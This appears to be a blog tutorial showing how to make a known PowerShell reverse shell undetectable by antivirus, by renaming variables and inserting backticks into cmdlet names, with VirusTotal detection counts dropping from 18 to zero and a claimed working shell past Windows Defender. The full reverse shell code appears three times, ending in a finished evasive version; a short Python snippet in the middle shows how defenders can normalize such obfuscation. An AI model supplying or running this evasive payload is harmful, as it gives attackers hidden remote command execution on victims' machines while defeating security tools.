Abdullah AlZahrani
From Detected to Undetected

Last updated 3 years ago

Introduction

It's a boring weekend, and it's so cold outdoors. So let's play a little bit with VirusTotal.

What we are going to do right now is take a sample that antivirus engines already detect and make it undetectable.

VirusTotal aggregates many antivirus products and online scan engines to check for viruses that the user's own antivirus may have missed, or to verify against any false positives. Antivirus software vendors can receive copies of files flagged by other scans but passed by their own engine to help improve their software.

Malicious Sample

Our sample choice is the "PowerShell reverse shell", coded by Nikhil Mittal.

```powershell
$client = New-Object System.Net.Sockets.TCPClient("127.0.0.1",443)
$stream = $client.GetStream()
[byte[]]$bytes = 0..255|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
    $sendback = (iex $data 2>&1 | Out-String )
    $sendback2  = $sendback + "PS " + (pwd).Path + "> "
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}
$client.Close()
```

First, let's check our sample with VirusTotal for the first time, before doing anything to it.

VirusTotal's result showed that 18 security vendors detected it. Let's play now.

Playtime

The easiest thing we can do first is to change the variable names to random ones.

```powershell
$Melia = New-Object System.Net.Sockets.TCPClient("127.0.0.1",443)
$Plouton = $Melia.GetStream()
[byte[]]$bytes = 0..255|%{0}
while(($i = $Plouton.Read($bytes, 0, $bytes.Length)) -ne 0){
    $Hekate = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
    $Tyr = (iex $Hekate 2>&1 | Out-String )
    $Tyr2  = $Tyr + "PS " + (pwd).Path + "> "
    $Lucretia = ([text.encoding]::ASCII).GetBytes($Tyr2)
    $Plouton.Write($Lucretia,0,$Lucretia.Length)
    $Plouton.Flush()
}
$Melia.Close()
```

Let's scan again now with our friend.

Fourteen security vendors flagged it as malicious on VirusTotal. Hmm, there is progress! With a few changes, we bypassed four vendors. Let's continue.

If we go to the details in VirusTotal's report, we will find the "Powershell Info" section. There we will see that VirusTotal identifies the cmdlets used in our script.

The magic of `

Let's try to add backtick between the commands. Then we'll see if VirusTotal can catch it or not.

PowerShell supports a set of sequences that are used to represent characters that aren't part of the standard character set. The sequences are commonly known as escape sequences.

Escape sequences begin with the backtick character, known as the grave accent (ASCII 96), and are case-sensitive. The backtick character can also be referred to as the escape character.

Escape sequences are only interpreted when contained in double-quoted (") strings.

| Sequence | Description             |
|----------|-------------------------|
| `0       | Null                    |
| `a       | Alert                   |
| `b       | Backspace               |
| `e       | Escape                  |
| `f       | Form feed               |
| `n       | New line                |
| `r       | Carriage return         |
| `t       | Horizontal tab          |
| `u{x}    | Unicode escape sequence |
| `v       | Vertical tab            |

So we must be careful about where we put the backtick; we don't want to break our commands.

Escaping "a" with a backtick means alert in PowerShell (who`ami), and escaping "f" with a backtick means form feed (ipcon`fig), so both of those commands break. Escaping any other character does not break the command, because those characters have no special meaning after the backtick.

To make the picture clear, see the following image.

Let's continue and add backtick to our code.

```powershell
$Melia = nEW`-oBj`ECt System.Net.Sockets.TCPClient("127.0.0.1",443)
$Plouton = $Melia.GetStream()
[byte[]]$bytes = 0..255|%{0}
while(($i = $Plouton.Read($bytes, 0, $bytes.Length)) -ne 0){
    $Hekate = (nEW`-oBj`ECt -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
    $Tyr = (I`Ex $Hekate 2>&1 | ouT`-St`RINg )
    $Tyr2  = $Tyr + "PS " + (P`w`d).Path + "> "
    $Lucretia = ([text.encoding]::ASCII).GetBytes($Tyr2)
    $Plouton.Write($Lucretia,0,$Lucretia.Length)
    $Plouton.Flush()
}
$Melia.Close()
```

Upload it to VirusTotal again and scan it.

As shown in the result, VirusTotal no longer detects the cmdlets used in our script! The backtick was helpful.

Really, I'm disappointed! We want to play more, but "No security vendors and no sandboxes flagged this file as malicious."
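To show the defender's side of the same trick, here is an added example (not from the original post, written in Python rather than PowerShell) that strips the backticks the parser ignores, keeps the ones that form real escape sequences from the table above, and then matches cmdlet names against a small constructed watchlist; the sample lines, the watchlist and the function names are assumptions.

```python
# Added example (not from the original post): normalize backtick-obfuscated
# PowerShell text so a detection rule can still match cmdlet names.
# Assumption: input is script text as captured by PowerShell script block
# logging (Event ID 4104) or a file scanner, with LF line endings.

# Chars forming a real escape after a backtick (table above); a backtick
# before any other char is dropped by the parser, which the obfuscation relies on.
SPECIAL_ESCAPES = set("0abefnrtuv")

# Constructed watchlist (lower-case) of cmdlets and aliases from the sample.
WATCHLIST = ("new-object", "invoke-expression", "iex",
             "out-string", "pwd", "tcpclient")


def normalize_powershell(text: str) -> str:
    """Drop meaningless backticks, keep real escapes, fold case."""
    out = []
    i = 0
    while i < len(text):
        ch = text[i]
        if ch == "`" and i + 1 < len(text):
            nxt = text[i + 1]
            if nxt == "\n":             # backtick + newline: line continuation
                i += 2
                continue
            if nxt in SPECIAL_ESCAPES:  # e.g. who`ami: `a is a real escape,
                out.append(ch)          # keep it (the token really is broken)
            i += 1                      # otherwise the backtick is dropped
            continue
        out.append(ch)
        i += 1
    # cmdlet and alias names are case-insensitive, so fold case for matching
    return "".join(out).lower()


def find_indicators(text: str) -> list:
    """Return watchlist entries present in the normalized script text."""
    norm = normalize_powershell(text)
    return [w for w in WATCHLIST if w in norm]


# Constructed sample lines in the style of the obfuscated script above.
SAMPLE = ('$Melia = nEW`-oBj`ECt System.Net.Sockets.TCPClient("127.0.0.1",443)\n'
          '$Tyr = (I`Ex $Hekate 2>&1 | ouT`-St`RINg )\n'
          '$Tyr2 = $Tyr + "PS " + (P`w`d).Path + "> "')

if __name__ == "__main__":
    print("naive:", [w for w in WATCHLIST if w in SAMPLE.lower()])
    print("normalized:", find_indicators(SAMPLE))
```

Naive substring matching on the raw text finds only `tcpclient`; after normalization all four obfuscated cmdlets and aliases are recovered as well.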

Test Time

It's time to test our code against Windows Defender and get a reverse shell, to make sure everything is working correctly.

(Screenshots: Victim's machine and Attacker's machine.)

It works fine.

Closing Words

Sometimes we do not need to do much to evade antivirus software! We could bypass all the antivirus engines just by changing the variable names and adding some backticks to the code, as you saw above.

